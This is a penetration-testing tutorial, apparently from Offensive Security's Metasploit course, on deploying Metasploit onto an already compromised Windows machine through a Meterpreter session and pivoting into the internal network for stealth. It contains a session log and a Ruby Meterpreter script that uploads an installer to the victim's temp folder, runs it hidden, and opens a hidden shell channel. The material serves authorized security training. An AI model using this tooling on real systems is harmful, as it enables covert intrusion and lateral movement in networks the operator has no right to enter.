
Metasploit as a Payload

Mubix from room362.com released a useful Ruby script for delivering Metasploit to an already compromised system: it lets you run Metasploit from the victim's machine and continue exploitation from there. There are many scenarios where this is valuable; the most important is a pentest in which you gain inside access with a Meterpreter session. From there you deliver Metasploit as a payload and continue exploitation against the internal network.

Why is this important?

Primarily stealth: the more connections you have going out through the perimeter, the better the chance of getting caught. With this payload, every further connection originates from, and returns to, the first machine you compromised. It also helps if you lose a connection, since only one machine needs to be set to call back, which we will show you how to do later in the course.

First things first, you need to download the Ruby script and place it in the 'plugins' folder.

Download deploymsf.rb from here ./msf/deploymsf.rb

Next, you need the Cygwin build of the Metasploit Framework. You have two options: the entire Metasploit Framework or just msfconsole. The trade-off is payload size: about 13 MB for the full version versus about 5 MB for msfconsole alone.

Full Metasploit Cygwin: https://metasploit.com/framework-3.3-dev.exe
Only msfconsole: https://metasploit.com/mini-3.3-dev.exe

If you use the default path in the Ruby script, move framework-3.3-dev.exe to /tmp/ on your Linux machine, or pass the '-d' option with the full directory where you put the Cygwin installer. Note also that the default executable name is framework-3.3-dev.exe; if you are using mini-3.3-dev.exe, pass the '-f' option with that filename.

root@bt4:/pentest/exploits/framework3/plugins# wget http://www.room362.com/tools/deploymsf.rb
--2009-06-27 12:10:05--  http://www.room362.com/tools/deploymsf.rb
Resolving www.room362.com... 66.197.106.2
Connecting to www.room362.com|66.197.106.2|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4227 (4.1K) [text/plain]
Saving to: `deploymsf.rb'

100%[======================================>] 4,227       --.-K/s   in 0.004s 

2009-06-27 12:10:05 (1.07 MB/s) - `deploymsf.rb' saved [4227/4227]


With mini-3.3-dev.exe in /tmp/ we have everything ready. Once we get a Meterpreter session there are a few commands to issue, so let's take a peek.

meterpreter > run deploymsf -f mini-3.3-dev.exe -d /tmp/
[*] Running Meterpreter MSFp Deployment Script.....
[*] Uploading MSFp for for deployment....
[*] MSFp uploaded as C:\DOCUME~1\bt4\LOCALS~1\Temp\19211.exe
[*] Installing MSFp...........
[*] Done!
[*] Installation Complete!
[*] Running cygwin shell channelized...
[*] Channel 19 created - Type: interact 19 to play
[*] Be warned, it takes a bit for post setup to happen
[*] and you will not see a prompt, try pwd to check
meterpreter > interact 19
Interacting with channel 19...

[*] Configuring multi-user permissions for first run...
[*] Configuring the initial user environment...
pwd
/home/bt4
ls
msfconsole
*** Metasploit only has EXPERIMENTAL support for Ruby 1.9.1 and newer, things may break!
*** Please report bugs to msfdev[at]metasploit.com
[-] ***
[-] * WARNING: No database support: LoadError no such file to load -- active_record
[-] ***


                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/  .__/ _|\___/ _|\__|
                               _|


       =[ metasploit v3.3-rc1 [core:3.3 api:1.0]
+ -- --=[ 379 exploits - 231 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 156 aux

msf >


We now have a fully interactive exploitation framework running on the victim's machine and can penetrate further into the network. Great stuff!
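The three steps the session above shows (upload the installer, run it silently, open a channelized Cygwin shell) written out as an illustrative Meterpreter script. This is an added example, not mubix's deploymsf.rb and not Offensive Security's code. It uses the Metasploit 3.x stdapi Ruby calls client.fs.file.expand_path, client.fs.file.upload_file, client.sys.process.execute and client.sys.process.get_processes; the '/S' silent-install switch, the bash.exe path after install, and the RecordingClient stand-in used for dry runs are assumptions.

```ruby
# Illustrative Meterpreter script for the deployment walked through above.
# Added as an example; it is NOT mubix's deploymsf.rb. The stdapi calls
# (client.fs.file.expand_path, client.fs.file.upload_file,
# client.sys.process.execute, client.sys.process.get_processes) are the
# Metasploit 3.x Meterpreter Ruby API; the silent-install flag and the
# location of bash.exe after install are assumptions.

SILENT_FLAG = '/S'                          # assumption: NSIS-style silent install switch
CYGWIN_BASH = 'C:\\cygwin\\bin\\bash.exe'   # assumption: installer's default target directory

# Random 8-letter name under the victim's %TEMP% so the upload does not clobber
# anything already there. expand_path resolves the variable on the victim.
def remote_temp_path(client, ext = '.exe')
  temp = client.fs.file.expand_path('%TEMP%')
  name = Array.new(8) { ('a'..'z').to_a.sample }.join
  "#{temp}\\#{name}#{ext}"
end

# Upload the installer, run it silently and wait for it to exit, then start a
# hidden, channelized Cygwin bash that the operator can `interact` with.
# Returns [remote_installer_path, shell_process].
def deploy_msf(client, installer_path)
  unless File.file?(installer_path)
    raise ArgumentError, "installer not found locally: #{installer_path}"
  end

  dest = remote_temp_path(client)
  client.fs.file.upload_file(dest, installer_path)

  # 'Hidden' keeps the installer off the victim's desktop; 'Channelized' gives
  # us a process handle whose pid we poll until the install has finished.
  setup = client.sys.process.execute(dest, SILENT_FLAG,
                                     { 'Hidden' => true, 'Channelized' => true })
  sleep 2 while client.sys.process.get_processes.any? { |p| p['pid'] == setup.pid }

  # The shell is channelized so its stdin/stdout ride the existing Meterpreter
  # session: no new connection leaves the perimeter, which is the whole point.
  shell = client.sys.process.execute(CYGWIN_BASH, '--login -i',
                                     { 'Hidden' => true, 'Channelized' => true })
  [dest, shell]
end

# Offline stand-in for the `client` object a Meterpreter script receives, so
# the flow above can be dry-run (and unit-tested) without a compromised host.
# It exposes the same call shapes and records what the script asked it to do.
class RecordingClient
  FakeChannel = Struct.new(:cid)
  FakeProcess = Struct.new(:pid, :channel)
  attr_reader :uploads, :executions

  def initialize(temp_dir)
    @temp_dir, @uploads, @executions, @next_pid = temp_dir, [], [], 1000
  end

  # client.fs.file.* and client.sys.process.* all resolve to this object.
  def fs;      self; end
  def file;    self; end
  def sys;     self; end
  def process; self; end

  def expand_path(path)
    path == '%TEMP%' ? @temp_dir : path
  end

  def upload_file(dest, src)
    @uploads << [dest, src]
  end

  def execute(path, args, opts)
    @executions << [path, args, opts]
    @next_pid += 1
    FakeProcess.new(@next_pid, FakeChannel.new(@executions.size))
  end

  # The dry-run installer "exits" immediately, so the poll loop returns at once.
  def get_processes
    []
  end
end

# Dry run with a constructed installer file; inside Meterpreter you would call
# deploy_msf(client, '/tmp/mini-3.3-dev.exe') and print shell.channel.cid so
# the operator knows which channel to interact with.
if __FILE__ == $PROGRAM_NAME
  require 'tmpdir'
  Dir.mktmpdir do |dir|
    fake_installer = File.join(dir, 'mini-3.3-dev.exe')
    File.write(fake_installer, 'MZ')   # constructed placeholder, not a real PE
    dest, shell = deploy_msf(RecordingClient.new('C:\\DOCUME~1\\bt4\\LOCALS~1\\Temp'), fake_installer)
    puts "[*] MSFp uploaded as #{dest}"
    puts "[*] Channel #{shell.channel.cid} created - Type: interact #{shell.channel.cid} to play"
  end
end
```

Polling get_processes for the installer's pid is what keeps the script from launching bash before Cygwin is on disk; that wait is the "Installing MSFp..........." pause in the session output. In a real script, `client` is already defined and print_status replaces puts.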


© Offensive Security 2009